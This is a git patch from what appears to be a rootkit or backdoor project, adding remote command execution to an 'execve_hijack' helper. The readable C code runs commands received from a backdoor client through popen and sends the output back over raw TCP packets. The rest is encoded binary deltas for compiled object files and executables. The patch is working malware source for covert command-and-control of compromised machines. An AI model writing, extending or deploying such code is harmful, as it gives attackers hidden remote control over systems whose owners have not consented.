From 0e022a838541b1714da06d6e6facc50863f76d33 Mon Sep 17 00:00:00 2001 From: h3xduck Date: Fri, 18 Feb 2022 04:06:18 -0500 Subject: [PATCH] Completed execution of arbitrary commands sent from the backdoor client --- src/client/client.c | 5 ++++- src/client/client.o | Bin 9664 -> 9832 bytes src/client/injector | Bin 41792 -> 41824 bytes src/helpers/execve_hijack | Bin 37488 -> 37664 bytes src/helpers/execve_hijack.c | 30 +++++++++++++++++++++++++++++- src/helpers/execve_hijack.o | Bin 4896 -> 6016 bytes 6 files changed, 33 insertions(+), 2 deletions(-) diff --git a/src/client/client.c b/src/client/client.c index 2bea0c6..5173646 100644 --- a/src/client/client.c +++ b/src/client/client.c @@ -162,7 +162,10 @@ void activate_command_control_shell(char* argv){ while(1){ char buf[BUFSIZ]; printf(""KYLW"c>:"RESET""); - scanf("%s", buf); + fgets(buf, BUFSIZ, stdin); + if ((strlen(buf)>0) && (buf[strlen(buf)-1] == '\n')){ + buf[strlen(buf)-1] = '\0'; + } char msg[BUFSIZ]; strcpy(msg, CC_PROT_MSG); diff --git a/src/client/client.o b/src/client/client.o index 6fd778d2b90a3d466ba5a90c596e8056db245382..bc46424c3f7f22f52c1b6a1a2aeb97bba1fc8ef1 100644 GIT binary patch delta 1317 zcmZ`(T}TvB6ux(M-EI77blrBE+-+xn#0_7XUN%JhL4-u1Lco%4NX?kuz3Tk5-= z;-%#S%U^s%eDPNmny;M%7FU(F_u{pWrCxdYvLTone%? z;On{K%rI`vkRz;4)UM$S+5*wsOV|f66;=6TFm%;eBMLE6vq5n5U2%Nh!W*HyNm$yo z1zcD8H>}}5P+yZ}(JTVn>HXKkwyyRxIjnobKIdO+kgmAsbZ=?kulk@(*C^u_gEvPfM?4=!}QpU?SyibBPpx4U36(sY-#( zM4MzNc1bcN9admC*~U-8VzQlYz`JC-e5@9qRD9YX)|i&>)Z3?7$cR%8A45bQVu|Q) Dl9YU` delta 1155 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 DO{zdw delta 4116 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 delta 6189 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 a%%z$=1$yBbm1v?jfthxy*jywl>Hh&7=bx_t diff --git a/src/helpers/execve_hijack.c b/src/helpers/execve_hijack.c index 0408387..35dc6b6 100644 --- a/src/helpers/execve_hijack.c +++ b/src/helpers/execve_hijack.c @@ -19,6 +19,28 @@ #include "lib/RawTCP.h" #include "../common/c&c.h" + +char* execute_command(char* command){ + FILE *fp; + char* res = calloc(4096, sizeof(char)); + char buf[1024]; + + fp = popen(command, "r"); + if(fp == NULL) { + printf("Failed to run command\n" ); + return "COMMAND ERROR"; + } + + while(fgets(buf, sizeof(buf), fp) != NULL) { + strcat(res, buf); + } + printf("RESULT OF COMMAND: %s\n", res); + + pclose(fp); + return res; +} + + char* getLocalIpAddress(){ char hostbuffer[256]; char* IPbuffer = calloc(256, sizeof(char)); @@ -108,10 +130,16 @@ int main(int argc, char* argv[]){ connection_close = 1; }else{ printf("Received request: %s\n", p); - packet_t packet_res = build_standard_packet(8000, 9000, local_ip, remote_ip, 4096, CC_PROT_MSG); + char* res = execute_command(p); + char* payload_buf = calloc(4096, sizeof(char)); + strcat(payload_buf, CC_PROT_MSG); + strcat(payload_buf, res); + packet_t packet_res = build_standard_packet(8000, 9000, local_ip, remote_ip, 4096, payload_buf); if(rawsocket_send(packet_res)<0){ return -1; } + free(payload_buf); + free(res); } } } diff --git a/src/helpers/execve_hijack.o b/src/helpers/execve_hijack.o index abdc4fb803f130602bac2b7c7bebc365336ec7a2..6f1af334607e91648aee08173562eb24ce02041b 100644 GIT binary patch literal 6016 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 O+5cHK^)mDD+y4z};$(CH